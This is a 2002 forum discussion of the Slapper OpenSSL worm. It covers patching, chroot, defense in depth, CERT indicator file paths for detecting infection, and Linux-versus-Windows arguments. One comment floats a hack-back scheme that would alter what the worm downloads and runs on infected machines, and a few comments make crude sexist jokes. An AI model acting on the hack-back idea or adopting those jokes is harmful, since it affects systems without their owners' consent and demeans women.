I don't know why more people don't chroot apache or patch to use chroot(2). It can be a pain at times, but it can't be worse then having to reformat and reinstall the entire os because your are not sure what was tampered with. I know chroot is not perfect and you can break out of it, but as long as you are carefull about what goes in it, you are relatively safe. It would at least keep rootkits away from gcc, which seems to be required for most of these rootkits.
From: Ron DuFresne [mailto:dufresne@winternet.com]
Sent: Tuesday, September 24, 2002 9:54 AM
To: firewalls@isc.org
Subject: Slapper worm redux;
Those folks relying upon security through obscurity might well wish to get
on the ball and fully patch-up;
September 23 VNUNET.COM.
A suspect has been arrested on suspicion of authoring the Slapper worm.
But although the threat of the worm seems to have been short-lived, a new
variant is already set to take up where its predecessor left off. Although
the ISC's 'most attacked ports' chart no longer features Slapper in its
Top 10 a variant, Slapper.B, has been spotted in the wild. Slapper.B has
several subtle differences, but is for the most part an updated version of
its predecessor. Both worms attempt to exploit a known vulnerability in
the Secure Sockets Layer 2.0 (SSLv2) handshake process. The two variants
also carry the same payload, a password-protected backdoor and denial of
service (DoS) capabilities. ISS's Morgan said that with the new variant on
the loose his company had calculated that about 10,000 servers were
probably now infected, and that the network was probably going to be used
for DoS attacks. He added that it was unlikely the original author created
the second worm. "It was significant that source code for the original
Slapper was distributed within the computer underground immediately after
the worm was detected in the wild," he said. Source:
http://www.vnunet.com/News/1135274
--
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
It's called "installed user base".
A linguistic note for Americans and other aliens....
"Slapper" is an EnglishEnglish term for a woman with an easily exploited hole....
Some have been claiming around here that slapper is a "demonstration" that Linux is no better than Windows, maybe worse... Sorry you people but this talk is just about onions and carrots. The fact is that a very similar attack, that happens nearly a year after CodeRed/Nimda carmageddon, shows a huge difference between both worlds.
If anyone takes the care to look at incidents.org site, one may see the facts for himself. Slapper didn't hit the stands. It is far from its Windows cousins, not only in terms of infected machines but also in attacks. And note specially the attacks. In less than 12 hours after Nimda's appearence I had more then 340000 Nimda "visits" on the network I surpervised. On what concerns Slapper, till now things are nearly on zero. Slapper is in no way a second Nimda.
Let me explain the process. You tell me if the analogy fits.
robber:
OpenSSL:
robber:
OpenSSL:
robber:
OpenSSL:
robber:
--- Nothing clever here: move along now...
You're kidding... right?
{look of utter fear from the thought that someone would say something like that and be serious.}
~ kjrose
Yes, I'm going to be joining in the crowds of the "Windows still sucks despite this". And here's my reason why:
Simply put, as one person commented, a default Linux installation usually defaults to almost all services being turned OFF, whereas many Windows installations default to vulnerable services being ON.
As a result, the percentage of Linux servers that are actually intended to be servers is FAR greater than the percentage of Windows machines with IIS running that someone is actively maintaining.
As a result, more systems get patched sooner.
For a little dose of reality about Slapper: A friend of mine installed a honeypot on his network, waiting for a Slapper hit so he could check out this new, oh-so-uber threat to our wonderful Linux.
After a few days (might've been as long as a week), Slapper finally hit his machine.
Guess what else hit his machine? Code Red, a year-old Windows worm that made headlines *well over a year ago*, a minimum of 12 CR hits per DAY.
Now, given the Netcraft statistics where Apache has 40-50% of the marketshare of web servers on the 'net - Shouldn't Slapper be hitting more often than Code Red?
But it isn't, because Linux installations are more secure out-of-the-box, and are NOT vulnerable out of the box. One of the main reasons so many Windows machines aren't having IIS patches applied is because the user doesn't even know that IIS is running!
retrorocket.o not found, launch anyway?
Having a patch in a few hours isnt all that impressive - its nice, but in effect - its not that useful.
I suppose it's more useful to be subject to the delays of what the commercial sfw industry calls "accepted vulnerability reporting practices" - which means we'll let you and your systems remain vulnerable for months while we:
people are wary of installing untested patches
I have all of my Linux systems on automatic update, and I've never once had a problem with a patch. I've also never had to accept a new EULA, never had icons I'd previously deleted return to my desktop, nor had third party software suddenly fail to work following a system update.
Tell me precisely what the difference is, in reality, between the so-called white hats that publish exploit code that allows script kiddies across the world to execute arbitrary code (w/o any modification) on remote machines and the so-called black hat that does the same thing only does not require the same number of script kiddies (because it is self-perpetuating)? Neither necessarily use or commence the attack themselves, but they enable thousands of machines to be hacked just the same. Maybe you can argue that proof of the concept does not require self-perpetuation or the installation of a backdoor (as in the case of the worm), but nor does it require the execution of code that is desirable to the script kiddy (as in the case of many so-called white hat advisories)
I think the idea is that the slapper worm will try to grab something from server X (which it believes to be infected) and it tries to run that. If I replaced what it was expecting with something else, that can't be my fault - an external entity was grabbing code off my servers and executing it, not me.
Perhaps I misread this idea tho?
creation science book
Comment removed based on user account deletion
Comment removed based on user account deletion
Not all Apache servers run on Linux. Not all Linux systems run Apache. Not all Linux/w Apache has mod_ssl.
Je ne parle pas francais.
... and you haven't already patched this months-old hole, hand in your resignation now. There's lots of folks more competent than you who need work.
one might write a wee proggie to sit on UDP port 2002,
Not good enough, I don't think.
I'm seeing remote ports 2140:2144 being used to attempt to connect to port 443.
So, I'm denying port 443 incoming and monitoring all outgoing unaccounted for udp. (Yes, we were infected.)
To-do List: Receive telemarketing call during a tornado warning. Check.
It does very little good to check for a rootkit when all the good GNU stuff in /bin has been trojaned...
-B
Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.
The job of the sysadmin is to stay on top of what is being revealed as vulnerable and then to act appropriately so as to mitigate risk. Updating packages automatically isn't doing that - what if the repository that apt is hitting has been compromised? What if the new version of package X has other issues that make it less than optimal?
One does not approach being secure by putting one's faith in some tool and hoping it solves everything. The only way to lock down a box is to be vigilant and aware, in my experience.
The problem isn't not having packages automatically updated, but rather that there are sysadmins who are militantly unaware of disclosed vulnerabilities in the software they run. Solve the latter and you don't need the (somewhat short-sighted) former.
We who were living are now dying
With a little patience
It transparently replaces the libc functions that are the usual targets of stack smashing attacks, and checks whether the stack frame has been overrun. If the stack has been smashed, the process gets terminated forcefully, and root (or other designated contact) gets an e-mail with all the details.
This has been out for several years now, and I am amazed that no major distribution includes this in a standard server install.
-Steve
Hey, Windows users, there is no such thing as "forward" slash, there is only slash and backslash.
For those of you who don't recall, the Pinto was a car with a minor flaw - If you bumped into its ass it tended to explode in a fireball.
Ford new of the problem, and even had a "patch" to fix it (minor design change adding some shielding around the tank if I recall). They chose not to fix the problem because of economics.
The same principle applies to large companies and security patches - If there's no exploit and we don't tell anyone the problem exists, maybe we can get away without investing the time/money (programmers are expen$ive!) in fixing it. Much like Ford, they are gambling that the losses due to the bug/hole/whatever won't be significant enough to hurt their profits long-term.
Software is a business, like any other, and businesses tend to make stupid decisions when they see a way to save a few pennies. They may be wrong (VERY VERY WRONG), but until EVERYONE makes it clear that the "patch it when it gets exploited" mentality hurts their business, the companies will continue doing as they have done.
/~mikeg
No matter how secure Linux claims to be, people should take the perception of default installs being invulnerable out of the box with a huge grain of salt, and give it a good look for anything they can turn off or plug up. The same goes for Windows users, ESPECIALLY for them in my opinion. :) If anything this whole Slapper issue should serve to educate both sides of the Windows vs. Linux debate that security problems exist for everyone no matter what you run.
"I'm a leaf on the wind. Watch how I soar."
-Hoban Washburn
And, it's not an Apache worm either. It's an OpenSSL worm that exploits security holes in OpenSSL 0.9.6f and earlier.
1 82002.ht m
While the current generation of Slapper targets only OpenSSL on Linux, it will try its attack on any system. And, with a little code tweaking, the next generation of Slapper could hammer on any OS that uses older versions of OpenSSL such as AIX, Solaris, Windows. In short, pretty much any OS that uses OpenSSL is potentially a victim.
Could you have it? If you're a Unix/Linux admin, use chkroot version 0.37 and up to find out. It's available at:
http://www.chkrootkit.org/
In any case, anyone who uses OpenSSL should update with OpenSSL 0.9.6g or higher ASAP. And, while you're at, be certain to relink everything since OpenSSL isn't used just by Apache. ISC, for example, used it in their BIND 9.1. Slapper wouldn't hit BIND, but would you care to bet that someone couldn't modify the code to launch a BIND attack--and aren't we all really, really sick of BIND getting bungled?
For more on Slapper, and a listing of patches for many operating systems see:
Slapper: The FUD and the Danger
http://www.practical-tech.com/network/n09
Finally, most of these patches, which would have stopped Slapper dead, were available in late July/early August. Consider it more proof that security is a full time system administrator job.
Steven
While you're right in part about the importance to secure a system, you miss out completely on the importance on defense in depth.
The worst flaw of them all about any security, not just information security, is depending on any one process or action or filter to take care of all attacks. It Won't Work. It Will Fail and when it does, you're hosed. The more defenses in depth you have deployed, the better off you are.
Let me illustrate some of the key design criteria for a modern-day tank (as in main battle tank) to illustrate:
1) Avoid detection.
2) If detected, avoid getting hit.
3) If hit, avoid penetration.
4) If penetrated, minimize damage to equipment and crew.
See what I mean? You have to consider what happens if your defenses fail, and where you would be the most vulnerable, and take additional steps there. Because, you know what? Your defenses will fail. But the more of them you have, the less damage an attacker will be able to do by bringing one down.
(One software company I used to work for would take this to extremes and code X-Files style; "Always assume that the entire world around you has been compromised, that your code is the last piece of code standing! Every data you get, even from within the system, is from somebody who's feeding you bogus or random data, or even lying on purpose to make you fail." But the resulting software had defense in depth.)
Anybody else have the idea that many vulnerabilities are partially due to deficiencies of the programming language used? For example, I believe that C's cumbersome string handling is a major cause of buffer-overrun vulnerabilities. Of course, buffer-overruns and off-by-one errors are programming errors, but I think their frequency at the very least lends legitimacy to programming languages designed to avoid such errors.
As for stack-smashing: I think stack shouldn't be executable anyway. Since Intel has given us data segments that aren't executable and code segments that aren't writable, at least x86 systems could be invulnerable to these attacks. Well, causing a segmentation fault would still lead to DoS I guess, but at least it wouldn't allow arbitrary code to be executed, which would also prevent worms from spreading. And if the segmentation fault would only terminate the thread that is being attacked, rahter than the whole server, it even DoS wouldn't be possible anymore - except through flooding, but that's a different story.
Summing up, I think there is reason to reconsider the lower-level components of our systems. Programming errors could to a large extend be avoided by using a language that doesn't allow them, and implementing a more rigid security system at memory manager level could stop certain exploits from working.
Please correct me if I got my facts wrong.
Look for the following (from CERT):
/tmp/.uubugtraq /tmp/.bugtraq.c /tmp/.bugtraq /tmp/.unlock.c /tmp/.update.c /tmp/.cinik /tmp/.cinik.c /tmp/.cinik.go /tmp/.cinik.goecho /tmp/.cinik.uu
Variant "A"
Variant "B"
Variant "C"
I have seen variant A and B on my network (I admin about 200 machines, but unfortunately the customers themselves, not I are in charge of patching their systems. I only go in and fix it when the customers realize something is wrong. Sort of a "meta-admin" if you will.)
I have not seen variant C, which I believe uses port 1978. Once the worm hit we blocked all the ports it uses at the router. This mitigated much of the damage, even though the exploit comes in on port 443.
HOWEVER be aware I have seen some attempted backdoor exploits that were not worm based. That is, an apache shell was obtained and someone was in on the system installing extra software and attempting to escalate privliages and crack the root account.
This is far more serious than the worm by itself. Fortunately, all I have seen so far is skript kiddies attempting to install backdoors that don't work because they do not have a rootshell. These backdoors were clearly not part of the regular worm. So other exploits than just the worm itself are out there.
Fortunately this worm is waking my customers up, and the systems are getting patched. (It does not matter how many times I run nessus, and send the customer a report saying "fix this", when I send them a message saying "you have now been hit" they suddenly spring into action, or get me to fix it. Funny how that works.)
Try to hack my 31337 firewall!
Hey all,
Ero Carrera at F-Secure.com asked that I post this for them:
"Information and live status about the worm can be found at http://www.f-secure.com/slapper/"
Inner Monologue I wonder if Ero is a guy or a chick? And if it's chick is she like looking, ya know what I mean?
You say things that offend me and I can deal with it. Can you?
This proves the Brits were behind slapper. And since the PATRIOT Act allows us to define propagating computer worms as an act of terrorism, I vote that the Bush Administration does what we should have done a long time ago:
INVADE BRITAIN!!!!